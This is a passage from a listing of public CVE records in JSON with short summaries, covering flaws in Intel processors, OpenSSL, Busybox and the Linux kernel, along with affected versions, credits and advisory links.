"vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5173" }, { "name": "DSA-5178", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5178" }, { "name": "DSA-5184", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5184" }, { "name": "FEDORA-2022-2c9f8224f8", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RKRXZ4LHGCGMOG24ZCEJNY6R2BTS4S2Q/" }, { "name": "GLSA-202208-23", "tags": [ "vendor-advisory", "x_refsource_GENTOO", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202208-23" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Intel(R) Processors", "vendor": "n/a", "versions": [ { "status": "affected", "version": "See references" } ] } ], "descriptions": [ { "lang": "en", "value": "Incomplete cleanup in specific special register write operations for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access." } ], "problemTypes": [ { "descriptions": [ { "description": " information disclosure ", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-08-14T20:10:06", "orgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce", "shortName": "intel" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html" }, { "name": "[oss-security] 20220616 Xen Security Advisory 404 v2 (CVE-2022-21123,CVE-2022-21125,CVE-2022-21166) - x86: MMIO Stale Data vulnerabilities", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2022/06/16/1" }, { "name": "FEDORA-2022-391e24517d", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FHTEW3RXU2GW6S3RCPQG4VNCZGI3TOSV/" }, { "name": "FEDORA-2022-177a008b98", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4P2KJYL74KGLHE4JZETVW7PZH6ZIABA/" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://security.netapp.com/advisory/ntap-20220624-0008/" }, { "name": "FEDORA-2022-925fc688c1", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MCVOMHBQRH4KP7IN6U24CW7F2D2L5KBS/" }, { "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html" }, { "name": "DSA-5173", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5173" }, { "name": "DSA-5178", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5178" }, { "name": "DSA-5184", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5184" }, { "name": "FEDORA-2022-2c9f8224f8", "tags": [ "vendor-advisory", "x_refsource_FEDORA" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RKRXZ4LHGCGMOG24ZCEJNY6R2BTS4S2Q/" }, { "name": "GLSA-202208-23", "tags": [ "vendor-advisory", "x_refsource_GENTOO" ], "url": "https://security.gentoo.org/glsa/202208-23" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "secure@intel.com", "ID": "CVE-2022-21166", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Intel(R) Processors", "version": { "version_data": [ { "version_value": "See references" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Incomplete cleanup in specific special register write operations for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": " information disclosure " } ] } ] }, "references": { "reference_data": [ { "name": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html", "refsource": "MISC", "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html" }, { "name": "[oss-security] 20220616 Xen Security Advisory 404 v2 (CVE-2022-21123,CVE-2022-21125,CVE-2022-21166) - x86: MMIO Stale Data vulnerabilities", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2022/06/16/1" }, { "name": "FEDORA-2022-391e24517d", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FHTEW3RXU2GW6S3RCPQG4VNCZGI3TOSV/" }, { "name": "FEDORA-2022-177a008b98", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T4P2KJYL74KGLHE4JZETVW7PZH6ZIABA/" }, { "name": "https://security.netapp.com/advisory/ntap-20220624-0008/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20220624-0008/" }, { "name": "FEDORA-2022-925fc688c1", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MCVOMHBQRH4KP7IN6U24CW7F2D2L5KBS/" }, { "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html" }, { "name": "DSA-5173", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5173" }, { "name": "DSA-5178", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5178" }, { "name": "DSA-5184", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5184" }, { "name": "FEDORA-2022-2c9f8224f8", "refsource": "FEDORA", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RKRXZ4LHGCGMOG24ZCEJNY6R2BTS4S2Q/" }, { "name": "GLSA-202208-23", "refsource": "GENTOO", "url": "https://security.gentoo.org/glsa/202208-23" } ] } } } }, "cveMetadata": { "assignerOrgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce", "assignerShortName": "intel", "cveId": "CVE-2022-21166", "datePublished": "2022-06-15T20:03:42", "dateReserved": "2021-11-12T00:00:00", "dateUpdated": "2024-08-03T02:31:59.119Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-4304
Vulnerability from cvelistv5
Published
2023-02-08 19:04
Modified
2024-08-03 01:34
Severity ?
EPSS score ?
Summary
A timing based side channel exists in the OpenSSL RSA Decryption implementation
which could be sufficient to recover a plaintext across a network in a
Bleichenbacher style attack. To achieve a successful decryption an attacker
would have to be able to send a very large number of trial messages for
decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5,
RSA-OEAP and RSASVE.
For example, in a TLS connection, RSA is commonly used by a client to send an
encrypted pre-master secret to the server. An attacker that had observed a
genuine connection between a client and a server could use this flaw to send
trial messages to the server and record the time taken to process them. After a
sufficiently large number of messages the attacker could recover the pre-master
secret used for the original connection and thus be able to decrypt the
application data sent over that connection.
References
▼ | URL | Tags |
---|---|---|
https://www.openssl.org/news/secadv/20230207.txt | vendor-advisory | |
https://security.gentoo.org/glsa/202402-08 |
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:34:50.158Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20230207.txt" }, { "tags": [ "x_transferred" ], "url": "https://security.gentoo.org/glsa/202402-08" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "lessThan": "3.0.8", "status": "affected", "version": "3.0.0", "versionType": "semver" }, { "lessThan": "1.1.1t", "status": "affected", "version": "1.1.1", "versionType": "custom" }, { "lessThan": "1.0.2zg", "status": "affected", "version": "1.0.2", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Hubert Kario from RedHat" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Dmitry Belyavsky from RedHat" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": " Hubert Kario from RedHat" } ], "datePublic": "2023-02-07T00:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "A timing based side channel exists in the OpenSSL RSA Decryption implementation\u003cbr\u003ewhich could be sufficient to recover a plaintext across a network in a\u003cbr\u003eBleichenbacher style attack. To achieve a successful decryption an attacker\u003cbr\u003ewould have to be able to send a very large number of trial messages for\u003cbr\u003edecryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5,\u003cbr\u003eRSA-OEAP and RSASVE.\u003cbr\u003e\u003cbr\u003eFor example, in a TLS connection, RSA is commonly used by a client to send an\u003cbr\u003eencrypted pre-master secret to the server. An attacker that had observed a\u003cbr\u003egenuine connection between a client and a server could use this flaw to send\u003cbr\u003etrial messages to the server and record the time taken to process them. After a\u003cbr\u003esufficiently large number of messages the attacker could recover the pre-master\u003cbr\u003esecret used for the original connection and thus be able to decrypt the\u003cbr\u003eapplication data sent over that connection.\u003cbr\u003e\u003cbr\u003e" } ], "value": "A timing based side channel exists in the OpenSSL RSA Decryption implementation\nwhich could be sufficient to recover a plaintext across a network in a\nBleichenbacher style attack. To achieve a successful decryption an attacker\nwould have to be able to send a very large number of trial messages for\ndecryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5,\nRSA-OEAP and RSASVE.\n\nFor example, in a TLS connection, RSA is commonly used by a client to send an\nencrypted pre-master secret to the server. An attacker that had observed a\ngenuine connection between a client and a server could use this flaw to send\ntrial messages to the server and record the time taken to process them. After a\nsufficiently large number of messages the attacker could recover the pre-master\nsecret used for the original connection and thus be able to decrypt the\napplication data sent over that connection.\n\n" } ], "metrics": [ { "format": "other", "other": { "content": { "text": "MODERATE" }, "type": "https://www.openssl.org/policies/secpolicy.html" } } ], "problemTypes": [ { "descriptions": [ { "description": "timing based side channel attack", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-08T19:04:28.890Z", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.openssl.org/news/secadv/20230207.txt" }, { "url": "https://security.gentoo.org/glsa/202402-08" } ], "source": { "discovery": "UNKNOWN" }, "title": "Timing Oracle in RSA Decryption", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2022-4304", "datePublished": "2023-02-08T19:04:28.890Z", "dateReserved": "2022-12-06T10:38:40.463Z", "dateUpdated": "2024-08-03T01:34:50.158Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-0466
Vulnerability from cvelistv5
Published
2023-03-28 14:30
Modified
2024-08-02 05:10
Severity ?
EPSS score ?
Summary
The function X509_VERIFY_PARAM_add0_policy() is documented to
implicitly enable the certificate policy check when doing certificate
verification. However the implementation of the function does not
enable the check which allows certificates with invalid or incorrect
policies to pass the certificate verification.
As suddenly enabling the policy check could break existing deployments it was
decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy()
function.
Instead the applications that require OpenSSL to perform certificate
policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly
enable the policy check by calling X509_VERIFY_PARAM_set_flags() with
the X509_V_FLAG_POLICY_CHECK flag argument.
Certificate policy checks are disabled by default in OpenSSL and are not
commonly used by applications.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:10:56.167Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20230328.txt" }, { "name": "3.1.1 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061" }, { "name": "3.0.9 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908" }, { "name": "1.1.1u git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a" }, { "name": "1.0.2zh patch (premium)", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230414-0001/" }, { "tags": [ "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5417" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/09/28/4" }, { "tags": [ "x_transferred" ], "url": "https://security.gentoo.org/glsa/202402-08" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "lessThan": "3.1.1", "status": "affected", "version": "3.1.0", "versionType": "semver" }, { "lessThan": "3.0.9", "status": "affected", "version": "3.0.0", "versionType": "semver" }, { "lessThan": "1.1.1u", "status": "affected", "version": "1.1.1", "versionType": "custom" }, { "lessThan": "1.0.2zh", "status": "affected", "version": "1.0.2", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "reporter", "user": "00000000-0000-4000-9000-000000000000", "value": "David Benjamin (Google)" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Tomas Mraz" } ], "datePublic": "2023-03-21T00:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "The function X509_VERIFY_PARAM_add0_policy() is documented to implicitly enable the certificate policy check when doing certificate verification. However the implementation of the function does notenable the check which allows certificates with invalid or incorrect policies to pass the certificate verification.\u003cbr\u003eAs suddenly enabling the policy check could break existing deployments it was decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() function.\u003cbr\u003eInstead the applications that require OpenSSL to perform certificate policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly enable the policy check by calling X509_VERIFY_PARAM_set_flags() with the X509_V_FLAG_POLICY_CHECK flag argument.\u003cbr\u003eCertificate policy checks are disabled by default in OpenSSL and are not commonly used by applications." } ], "value": "The function X509_VERIFY_PARAM_add0_policy() is documented to\nimplicitly enable the certificate policy check when doing certificate\nverification. However the implementation of the function does not\nenable the check which allows certificates with invalid or incorrect\npolicies to pass the certificate verification.\n\nAs suddenly enabling the policy check could break existing deployments it was\ndecided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy()\nfunction.\n\nInstead the applications that require OpenSSL to perform certificate\npolicy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly\nenable the policy check by calling X509_VERIFY_PARAM_set_flags() with\nthe X509_V_FLAG_POLICY_CHECK flag argument.\n\nCertificate policy checks are disabled by default in OpenSSL and are not\ncommonly used by applications." } ], "metrics": [ { "format": "other", "other": { "content": { "text": "Low" }, "type": "https://www.openssl.org/policies/secpolicy.html" } } ], "problemTypes": [ { "descriptions": [ { "description": "improper certificate validation", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2023-03-28T14:30:49.595Z", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.openssl.org/news/secadv/20230328.txt" }, { "name": "3.1.1 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061" }, { "name": "3.0.9 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908" }, { "name": "1.1.1u git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a" }, { "name": "1.0.2zh patch (premium)", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72" }, { "url": "https://security.netapp.com/advisory/ntap-20230414-0001/" }, { "url": "https://www.debian.org/security/2023/dsa-5417" }, { "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html" }, { "url": "http://www.openwall.com/lists/oss-security/2023/09/28/4" }, { "url": "https://security.gentoo.org/glsa/202402-08" } ], "source": { "discovery": "UNKNOWN" }, "title": "Certificate policy check not enabled", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2023-0466", "datePublished": "2023-03-28T14:30:49.595Z", "dateReserved": "2023-01-24T13:52:42.631Z", "dateUpdated": "2024-08-02T05:10:56.167Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-30065
Vulnerability from cvelistv5
Published
2022-05-18 00:00
Modified
2024-08-03 06:40
Severity ?
EPSS score ?
Summary
A use-after-free in Busybox 1.35-x's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the copyvar function.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T06:40:47.557Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugs.busybox.net/show_bug.cgi?id=14781" }, { "tags": [ "x_transferred" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free in Busybox 1.35-x\u0027s awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the copyvar function." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-13T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://bugs.busybox.net/show_bug.cgi?id=14781" }, { "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-30065", "datePublished": "2022-05-18T00:00:00", "dateReserved": "2022-05-02T00:00:00", "dateUpdated": "2024-08-03T06:40:47.557Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3524
Vulnerability from cvelistv5
Published
2022-10-16 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function ipv6_renew_options of the component IPv6 Handler. The manipulation leads to memory leak. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211021 was assigned to this vulnerability.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:02.569Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c52c6bb831f6335c176a0fc7214e26f43adbd11" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211021" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function ipv6_renew_options of the component IPv6 Handler. The manipulation leads to memory leak. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211021 was assigned to this vulnerability." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-404", "description": "CWE-404 Denial of Service -\u003e CWE-401 Memory Leak", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-24T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c52c6bb831f6335c176a0fc7214e26f43adbd11" }, { "url": "https://vuldb.com/?id.211021" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "Linux Kernel IPv6 ipv6_renew_options memory leak", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3524", "datePublished": "2022-10-16T00:00:00", "dateReserved": "2022-10-16T00:00:00", "dateUpdated": "2024-08-03T01:14:02.569Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-42721
Vulnerability from cvelistv5
Published
2022-10-13 00:00
Modified
2024-08-03 13:10
Severity ?
EPSS score ?
Summary
A list management bug in BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to corrupt a linked list and, in turn, potentially execute code.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:10:41.467Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1204060" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/10/13/5" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/wireless/wireless.git/commit/?id=bcca852027e5878aec911a347407ecc88d6fff7f" }, { "name": "FEDORA-2022-2cfbe17910", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/" }, { "name": "FEDORA-2022-b948fc3cfb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/" }, { "name": "FEDORA-2022-1a5b125ac6", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/" }, { "name": "DSA-5257", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/169951/Kernel-Live-Patch-Security-Notice-LSN-0090-1.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230203-0008/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A list management bug in BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to corrupt a linked list and, in turn, potentially execute code." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-03T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://bugzilla.suse.com/show_bug.cgi?id=1204060" }, { "url": "http://www.openwall.com/lists/oss-security/2022/10/13/5" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/wireless/wireless.git/commit/?id=bcca852027e5878aec911a347407ecc88d6fff7f" }, { "name": "FEDORA-2022-2cfbe17910", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/" }, { "name": "FEDORA-2022-b948fc3cfb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/" }, { "name": "FEDORA-2022-1a5b125ac6", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/" }, { "name": "DSA-5257", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "url": "http://packetstormsecurity.com/files/169951/Kernel-Live-Patch-Security-Notice-LSN-0090-1.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230203-0008/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-42721", "datePublished": "2022-10-13T00:00:00", "dateReserved": "2022-10-10T00:00:00", "dateUpdated": "2024-08-03T13:10:41.467Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-42895
Vulnerability from cvelistv5
Published
2022-11-23 14:11
Modified
2024-08-03 13:19
Severity ?
EPSS score ?
Summary
There is an infoleak vulnerability in the Linux kernel's net/bluetooth/l2cap_core.c's l2cap_parse_conf_req function which can be used to leak kernel pointers remotely.
We recommend upgrading past commit https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e https://www.google.com/url
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Linux | Linux Kernel |
Version: 3.0.0 < |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:19:05.390Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e" }, { "tags": [ "x_transferred" ], "url": "https://kernel.dance/#b1a2cd50c0357f243b7435a732b4e62ba3157a2e" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "packageName": "kernel", "product": "Linux Kernel", "repo": "https://git.kernel.org", "vendor": "Linux", "versions": [ { "lessThanOrEqual": "b1a2cd50c0357f243b7435a732b4e62ba3157a2e", "status": "affected", "version": "3.0.0", "versionType": "custom" } ] } ], "datePublic": "2022-11-02T23:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eThere is an infoleak vulnerability in the Linux kernel\u0027s net/bluetooth/l2cap_core.c\u0027s l2cap_parse_conf_req function which can be used to leak kernel pointers 